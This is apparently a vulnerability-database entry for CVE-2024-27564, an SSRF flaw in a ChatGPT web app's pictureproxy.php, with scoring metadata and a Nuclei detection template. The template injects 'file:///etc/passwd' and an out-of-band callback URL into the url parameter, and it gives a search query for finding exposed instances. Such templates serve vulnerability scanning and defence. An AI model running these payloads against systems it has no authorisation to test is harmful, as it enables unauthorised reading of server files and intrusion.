Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-27564
HistoryMar 30, 2024 - 6:53 a.m.

ChatGPT个人专用版 - Server Side Request Forgery

2024-03-3006:53:35
ProjectDiscovery
github.com
64
cve2024
chatgpt
ssrf
oast
oos
lfi
server
request
forgery
injection
crafted
urls

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

20.2%

A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
id: CVE-2024-27564

info:
  name: ChatGPT个人专用版 - Server Side Request Forgery
  author: DhiyaneshDK
  severity: high
  description: |
    A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.
  reference:
    - https://github.com/dirk1983/chatgpt/issues/114
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27564
  metadata:
    verified: true
    max-request: 2
    fofa-query: "title=\"ChatGPT个人专用版\""
  tags: cve,cve2024,chatgpt,ssrf,oast,oos,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/pictureproxy.php?url=file:///etc/passwd"
      - "{{BaseURL}}/pictureproxy.php?url=http://{{interactsh-url}}"

    stop-at-first-match: true

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(header, "image/jpeg")
          - regex('root:.*:0:0:', body)
        condition: and

      - type: dsl
        dsl:
          - contains(interactsh_protocol, "dns")
          - contains(header, "image/jpeg")
          - status_code == 200
        condition: and
# digest: 490a0046304402205ae8c7b8e367577b1052683aa4b48d038bc2308c7299d24c0f6530b33b0ac9af022058dcc4c45ed777943b6e87ac9605afbd095f2bad41f6963d208ad6f85e702375:922c64590222798bb761d5b6d8e72950

CVSS3

6.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

AI Score

6.9

Confidence

High

EPSS

0.001

Percentile

20.2%

Related for NUCLEI:CVE-2024-27564